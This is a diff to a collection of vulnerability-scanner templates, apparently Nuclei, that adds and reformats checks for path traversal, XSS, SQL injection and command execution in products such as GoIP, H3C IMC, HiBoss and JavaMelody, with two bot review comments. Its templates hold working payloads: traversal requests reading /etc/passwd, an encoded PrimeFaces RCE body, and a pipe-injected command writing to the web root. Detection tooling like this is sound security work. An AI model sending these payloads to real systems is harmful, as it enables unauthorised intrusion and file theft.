@@ -0,0 +1,35 @@ +id: gnuboard-sms-xss + +info: + name: Gnuboard CMS - SMS Emoticon XSS + author: gy741 + severity: medium + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. + reference: + - https://sir.kr/g5_pds/4788?page=5 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + metadata: + verified: true + shodan-query: http.html:"Gnuboard" + tags: xss,gnuboard + +requests: + - method: GET + path: + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"0nuboard"' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/goip-1-lfi.yaml b/vulnerabilities/other/goip-1-lfi.yaml new file mode 100644 index 0000000000..6070b4dcc9 --- /dev/null +++ b/vulnerabilities/other/goip-1-lfi.yaml @@ -0,0 +1,24 @@ +id: goip-1-lfi + +info: + name: GoIP-1 GSM - Local File Inclusion + author: gy741 + severity: high + description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker + to read arbitrary files on the affected system. + reference: + - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ + - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf + - http://en.dbltek.com/latestfirmwares.html + tags: gsm,goip,lfi,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" 
diff --git a/vulnerabilities/other/groupoffice-lfi.yaml b/vulnerabilities/other/groupoffice-lfi.yaml new file mode 100644 index 0000000000..142e511ab2 --- /dev/null +++ b/vulnerabilities/other/groupoffice-lfi.yaml @@ -0,0 +1,26 @@ +id: groupoffice-lfi + +info: + name: Groupoffice 3.4.21 Directory Traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018020249 + - http://www.group-office.com + tags: groupoffice,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml index e679dee126..fd296bca72 100644 --- a/vulnerabilities/other/gsoap-lfi.yaml +++ b/vulnerabilities/other/gsoap-lfi.yaml @@ -4,7 +4,8 @@ info: name: gSOAP 2.8 - Directory Traversal author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/47653 + reference: + - https://www.exploit-db.com/exploits/47653 tags: gsoap,lfi requests: diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 2c0133a076..7448e95f74 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml 
@@ -5,22 +5,35 @@ info: author: pikpikcu severity: critical description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint - reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + reference: + - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + metadata: + fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" tags: rce,h3c-imc requests: - - method: POST - path: - - "{{BaseURL}}/imc/javax.faces.resource/dynamiccontent.properties.xhtml" - body: | - pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmb
wcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat%20/etc/passwd + - raw: + - | + POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}} + + payloads: + command: + - 'cat 
/etc/passwd' + - 'type C:\\Windows\\win.ini' + + stop-at-first-match: true matchers-condition: and matchers: - - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - type: status status: diff --git a/vulnerabilities/other/hanming-lfr.yaml b/vulnerabilities/other/hanming-lfr.yaml new file mode 100644 index 0000000000..9a90adea5b --- /dev/null +++ b/vulnerabilities/other/hanming-lfr.yaml @@ -0,0 +1,30 @@ +id: hanming-lfr + +info: + name: Hanming Video Conferencing File Read + author: ritikchaddha + severity: high + reference: + - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA + tags: lfr,hanming,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini" + - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index 47a2da9817..b631c96023 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -4,7 +4,8 @@ info: name: Hashicorp Consul Services Api RCE author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/46074 + reference: + - https://www.exploit-db.com/exploits/46074 tags: hashicorp,rce,oast,intrusive requests: diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 00d5756dd4..8bc90128e4 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml 
@@ -1,12 +1,13 @@ id: hasura-graphql-psql-exec info: - author: Udyz name: Hasura GraphQL Engine - postgresql query exec + author: Udyz severity: critical description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint. - reference: https://www.exploit-db.com/exploits/49802 - tags: hasura,rce + reference: + - https://www.exploit-db.com/exploits/49802 + tags: hasura,rce,graphql requests: - raw: diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index ab8bbe4a7a..43771ef843 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -1,10 +1,12 @@ id: hasura-graphql-ssrf + info: name: Hasura GraphQL Engine - SSRF Side Request Forgery author: princechaddha severity: high - reference: https://cxsecurity.com/issue/WLB-2021040115 - tags: hasura,ssrf + reference: + - https://cxsecurity.com/issue/WLB-2021040115 + tags: hasura,ssrf,graphql requests: - raw: diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 10df9f9c37..6b90431fa1 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml 
@@ -5,26 +5,26 @@ info: author: pikpikcu severity: critical description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. - reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 + reference: + - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 tags: hiboss,rce requests: - raw: - | - GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 + GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{{randstr}}.txt&id=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - | - GET /poc.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index a4301b8ce5..1e8a385c2d 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -4,7 +4,8 @@ info: name: HJTcloud Arbitrary File Read author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + reference: + - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw tags: hjtcloud,lfi requests: 
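Review bot: The first raw request in hiboss-rce still writes a file into the target's web root (`>../../{{randstr}}.txt`) and nothing removes it afterwards, so every scan leaves a persistent artifact on the host; switching the name to `{{randstr}}` avoids collisions between runs but does not change that side effect. Templates with such effects carry the `intrusive` tag elsewhere in this commit (hashicorp-consul-rce has `tags: hashicorp,rce,oast,intrusive`), so this one should be `tags: hiboss,rce,intrusive` so operators who exclude intrusive templates skip it. A comment above the request such as `# writes a file under the web root; it is not cleaned up` would make the side effect visible to the next maintainer.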
diff --git a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index 6641fa4b62..3d5c205fec 100644 --- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -4,7 +4,8 @@ info: name: HJTcloud Arbitrary file read author: pikpikcu severity: low - reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + reference: + - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw tags: hjtcloud,lfi requests: diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index d41f1c89fb..539e6eb49d 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: medium description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: diff --git a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index 93e24dde8d..eb3bfcfe28 100644 --- a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -1,10 +1,12 @@ id: hrsale-unauthenticated-lfi + info: name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi author: 0x_Akoko severity: high description: This exploit allow you to download any readable file from server without permission and login session - reference: https://www.exploit-db.com/exploits/48920 + reference: + - https://www.exploit-db.com/exploits/48920 tags: hrsale,lfi requests: 
diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml index e968e2fd34..9848bc2218 100644 --- a/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index 8b2dc50919..1ab77f4a97 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -1,8 +1,11 @@ id: huijietong-cloud-fileread + info: name: Huijietong Cloud File Read - author: princechaddha + author: princechaddha,ritikchaddha severity: high + metadata: + fofa-query: body="/him/api/rest/v1.0/node/role" tags: huijietong,lfi requests: @@ -11,12 +14,19 @@ requests: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" body: 'fullPath=/etc/passwd' + - method: POST + path: + - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/Windows/win.ini' + matchers-condition: and matchers: - - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - type: status status: diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml index caa8758541..cf829fe9d3 100644 --- a/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -4,8 +4,9 @@ info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E requests: - raw: 
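Review bot: The second hunk of huijietong-cloud-fileread adds a second POST to the same `fileDownload?action=downloadBackupFile` endpoint, and with no `stop-at-first-match: true` both requests are always sent even when the first already matched. h3c-imc-rce and hanming-lfr in this same commit set `stop-at-first-match: true` for the same Linux/Windows pair, so adding that line above `matchers-condition: and` keeps the template consistent and halves the traffic on a hit. The enclosing `requests` block starts outside the hunk.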
diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index ff2833281d..9386ffb3b2 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -4,7 +4,8 @@ info: name: Interlib Fileread author: pikpikcu severity: high - reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md tags: interlib,lfi requests: @@ -18,7 +19,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "for 16-bit app support" condition: or diff --git a/vulnerabilities/other/java-melody-xss.yaml b/vulnerabilities/other/java-melody-xss.yaml new file mode 100644 index 0000000000..efa41edf75 --- /dev/null +++ b/vulnerabilities/other/java-melody-xss.yaml 
@@ -0,0 +1,31 @@ +id: java-melody-xss + +info: + name: JavaMelody Monitoring - Cross-Site Scripting + author: kailashbohara + severity: medium + description: Reflected cross site scripting (XSS) in JavaMelody monitoring. + reference: + - https://github.com/Hurdano/JavaMelody-XSS + - https://github.com/javamelody/javamelody/pull/555 + tags: xss,javamelody + +requests: + - method: GET + path: + - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index a269c40da8..eb3fc80104 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml @@ -4,13 +4,14 @@ info: name: JEEWMS LFI author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g + reference: + - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g tags: jeewms,lfi requests: - raw: - | #linux - GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 + GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -24,7 +25,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 95f977e802..ec0b342990 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml 
@@ -4,7 +4,8 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog requests: diff --git a/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/vulnerabilities/other/jinfornet-jreport-lfi.yaml new file mode 100644 index 0000000000..33c359624a --- /dev/null +++ b/vulnerabilities/other/jinfornet-jreport-lfi.yaml @@ -0,0 +1,28 @@ +id: jinfornet-jreport-lfi + +info: + name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. + This vulnerability affects Windows and Unix operating systems. + reference: + - https://cxsecurity.com/issue/WLB-2020030151 + - https://www.jinfonet.com/product/download-jreport/ + tags: jreport,jinfornet,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index 7ec3ae6352..e0cdd36ce7 100644 --- a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -4,8 +4,9 @@ info: name: Joomla! com_fabrik 3.9.11 - Directory Traversal author: dhiyaneshDk severity: high + reference: + - https://www.exploit-db.com/exploits/48263 tags: joomla,lfi - reference: https://www.exploit-db.com/exploits/48263 requests: - method: GET 
diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index e7061938bd..32f69bbf74 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -1,12 +1,13 @@ id: kafdrop-xss info: - name: KafDrop XSS + name: KafDrop - Cross-Site Scripting author: dhiyaneshDk severity: medium + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server. + reference: + - https://github.com/HomeAdvisor/Kafdrop/issues/12 tags: kafdrop,xss - description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. - reference: https://github.com/HomeAdvisor/Kafdrop/issues/12 requests: - method: GET diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index ae79e71a41..867311d115 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml 
@@ -4,9 +4,12 @@ info: name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account author: gy741 severity: critical - description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php - tags: kevinlab + description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the + RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users + settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab,backdoor requests: - raw: diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 2f24495c6d..929f8c97cc 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml 
@@ -4,7 +4,8 @@ info: name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass author: gy741 severity: high - description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. + description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the + user or used in SQL queries. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php - https://www.exploit-db.com/exploits/50146 diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml index 7d4152fc83..525d27e4c1 100644 --- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml 
